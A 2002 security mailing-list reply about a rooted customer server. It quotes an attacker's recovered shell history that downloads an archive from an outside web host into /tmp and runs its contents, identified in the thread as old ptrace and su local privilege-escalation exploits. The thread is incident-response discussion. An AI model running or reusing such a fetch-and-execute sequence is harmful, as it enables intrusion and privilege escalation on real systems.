
Re: Rooted, .haos on system



On Mon, 16 Dec 2002 13:47:28 -0500
Damian Gerow <damian@xxxxxxxxxx> wrote:

> On Mon, 2002-12-16 at 12:38, Damian Gerow wrote:
> > On Thu, 2002-12-12 at 18:50, Damian Gerow wrote:
> > > I've just received word that one of our customers was rooted, and he's
> > > asking about the file ".haos".  Nothing rings any bells, has anyone heard
> > > of it?
> > 
> > Just a quick update to this...
> 
> And one last tidbit...
> 
> Left in the .bash_history was this:
> 
>         w
>         cd /tmp
>         wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
>         ./epc
> 
> A quick check tells me that 'epc' is a backdoor utility, and the other
> file contained within loc.tgz looks like a trojaned 'su'.

No, for me this looks like:
	epc -> ptrace local exploit
	su -> su local exploit

They're old shit, and I guess your system wasn't updated.

> 
> I've already notified Geocities abuse, and haven't heard back from them
> yet.
> 

Good luck,

-- 
Carlos Eduardo Pedroza Santiviago -- <segfault@*NO_SPAM*brturbo.com>
Key id/fp = 4B5EB579/A817 71A3 AA78 1997 65DA  0665 A341 D4A4 4B5E B579
